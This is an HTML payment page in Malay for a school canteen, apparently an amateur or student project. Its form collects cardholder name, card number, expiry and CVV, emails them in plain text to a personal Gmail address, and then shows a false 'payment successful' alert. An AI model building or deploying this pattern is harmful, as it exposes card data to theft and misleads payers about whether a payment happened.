<!DOCTYPE html>
<html lang="ms">
   <head>
      <title>Bayar secara kad</title>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
      <style>
         *{box-sizing: border-box;}
         body {margin: 5;}
         .row {display: flexbox; display: flex;flex-wrap: wrap; flex-wrap: wrap;margin: 0 -16px;}
         .col-25 {flex: 25%;flex: 25%;}
         .col-50 {flex: 50%;flex: 50%;}
         .col-75 {flex: 75%;flex: 75%;}
         .col-25,
         .col-50,
         .col-75 {padding: 0 16px;}
         .container {background-color: #f2f2f2;padding: 5px 20px 15px 20px;border: 1px solid lightgrey;border-radius: 3px;}
         input[type=text], input[type=month]{width: 100%;margin-bottom: 20px;padding: 12px;border: 1px solid #ccc;border-radius: 3px;}
         label {margin-bottom: 10px;display: block;}
         .icon-container {margin-bottom: 20px;padding: 7px 0;font-size: 24px;}
         .btn {background-color: #04AA6D;color: white;padding: 12px;margin: 10px 0;border: none; width: 100%;border-radius: 3px;cursor: pointer;font-size: 17px;}
         .btn:hover {background-color: #45a049;}
      </style>
   </head>
   <body>
      <h2>Bayar secara kad</h2>
      <p>Sila lengkapkan borang ini untuk menyelesaikan tempahan anda dan menerima invois anda semasa anda menerima makanan atau minuman anda di kantin sekolah.</p>
      <form action="mailto:joeyyongxin@gmail.com" method="post" enctype="text/plain" onsubmit="confirmInput()">
         <div class="container">
            <div class="col-50">
               <h3>Pembayaran</h3>
               <label for="card">Kad yang Diterima</label>
               <div class="icon-container">
                  <i class="fa fa-cc-visa" style="color:navy;"></i>
                  <i class="fa fa-cc-amex" style="color:blue;"></i>
                  <i class="fa fa-cc-mastercard" style="color:red;"></i>
                  <i class="fa fa-cc-discover" style="color:orange;"></i>
               </div>
               <label for="cname">Nama Pada Kad</label>
               <input type="text" id="cname" name="Nama Pada Kad" placeholder="Azend" required>
               <label for="ccnum">Nombor Kredit Kad</label>
               <input type="text" id="ccnum" name="Nombor Kredit Kad" placeholder="1111-2222-3333-4444" required>
               <label for="expdate">Tarikh Luput</label>
               <input type="month" id="expdate" name="Tarikh Luput" required>
               <label for="cvv">CVV</label>
               <input type="text" id="cvv" name="CVV" placeholder="352" required>
               <label for="money">Jumlah Bayaran</label>
               <input type="text" id="money" name="Jumlah Bayaran" placeholder="RM 10" required>
            </div>
         </div>
         <button type="submit" class="btn" onsubmit="confirmInput()">Teruskan ke pembayaran</button>
      </form>
      <script>
         function confirmInput() {cname = document.forms[0].cname.value;alert(cname + ", anda telah berjaya membayar.");}
      </script>
   </body>
</html>